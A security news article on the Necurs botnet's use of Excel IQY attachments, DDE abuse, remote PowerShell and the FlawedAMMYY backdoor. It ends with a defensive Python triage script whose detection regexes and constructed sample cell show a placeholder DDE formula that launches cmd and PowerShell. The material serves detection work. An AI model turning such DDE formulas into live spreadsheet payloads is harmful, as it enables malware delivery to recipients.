The Necurs botnet has been actively attacking in various forms since 2017, causing damage in many countries.
Necurs' current distribution uses advanced functionality to evade malware detection engines by using internet shortcut files.
This year alone, Necurs sent more than 230 million dating spam messages, starting in mid-January 2018 and ending on February 3.
The Necurs botnet was mainly used to spread Locky ransomware, one of the most dangerous ransomware families in history, which infected millions of people around the world.
Currently it is distributed as an IQY file, used as the initial infection vector. IQY files are normally used to import data from external sources into a user's Excel spreadsheet.
“So by default, Windows recognizes IQY files as MS Excel Web Query Files and automatically executes them in Excel.”
Necurs Botnet Infection Process
Initially, Necurs spreads via spam email whose content refers to sales promotions, offers, and discounts, with an IQY file attached.
Once a user opens the attachment, the file pulls data from the targeted URL into an Excel worksheet.
The pulled data contains a script that abuses Excel's Dynamic Data Exchange (DDE) feature, enabling it to execute a command line that starts a PowerShell process, which in turn runs a remote PowerShell script in a fileless manner.
According to the Trend Micro report, the PowerShell script downloads an executable file, a trojanized remote access application, and its final payload: the backdoor FlawedAMMYY (detected as BKDR_FlawedAMMYY.A). This backdoor appears to have been developed from the leaked source code of the remote administration software Ammyy Admin.
The FlawedAMMYY backdoor executes commands from a remote malicious server to perform various malicious and data-stealing activities, including File Manager, View Screen, Remote Control, and Audio Chat.
“Adding this new layer of evasion to Necurs poses new challenges because web queries generally come in the form of plaintext files, which makes the attached IQY file’s URL the only indication of malware activity,” Trend Micro said.
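Because the IQY attachment is plaintext and its URL is the only indicator, a mail gateway or sandbox can triage it before Excel ever opens it. The following Python is an added example (not from Trend Micro or the article): it parses the IQY layout (line 1 `WEB`, line 2 the version `1`, line 3 the query URL), flags queries to hosts outside an assumed allowlist, and scans whatever the URL returns for the DDE command-launch formulas described above. The allowlist host and the sample files are constructed.

```python
import re
from urllib.parse import urlparse

# Hosts from which the organisation deliberately publishes web queries
# (assumption for this example; a real deployment would load its own list).
ALLOWED_HOSTS = {"intranet.example.local"}

# Cell content that hands a command line to Excel's DDE machinery, e.g. a cell
# starting "=cmd|..." or a DDE() call; the infection chain above starts this way.
DDE_LAUNCH = re.compile(r"^\s*=\s*(cmd|msexcel|powershell)\s*\|", re.IGNORECASE | re.MULTILINE)
DDE_FUNC = re.compile(r"\bDDE\s*\(", re.IGNORECASE)


def parse_iqy(text):
    """Return {'url': ..., 'problems': [...]} for the text body of an IQY file."""
    lines = [line.strip() for line in text.splitlines() if line.strip()]
    problems = []
    if len(lines) < 3 or lines[0].upper() != "WEB" or lines[1] != "1":
        problems.append("not a well-formed web query header")
        return {"url": None, "problems": problems}
    url = lines[2]
    parsed = urlparse(url)
    if parsed.hostname not in ALLOWED_HOSTS:
        problems.append(f"query fetches from unapproved host {parsed.hostname}")
    if parsed.scheme == "http":
        problems.append("query uses cleartext http")
    return {"url": url, "problems": problems}


def dde_indicators(body):
    """Scan the data a query URL returned for DDE formulas that launch commands."""
    hits = []
    if DDE_LAUNCH.search(body):
        hits.append("DDE command-launch formula")
    if DDE_FUNC.search(body):
        hits.append("DDE() function call")
    return hits


# Constructed samples: a lure attachment, a legitimate internal query, and a
# stand-in for the worksheet data a malicious server would return.
SUSPICIOUS_IQY = "WEB\n1\nhttp://spam-lure.example/invoice.iqy\n"
BENIGN_IQY = "WEB\n1\nhttps://intranet.example.local/sales/report\n"
FETCHED_CELLS = "=cmd|'/c powershell <constructed placeholder>'!A0\n"

if __name__ == "__main__":
    for name, sample in (("lure", SUSPICIOUS_IQY), ("internal", BENIGN_IQY)):
        print(name, parse_iqy(sample))
    print("fetched data:", dde_indicators(FETCHED_CELLS))
```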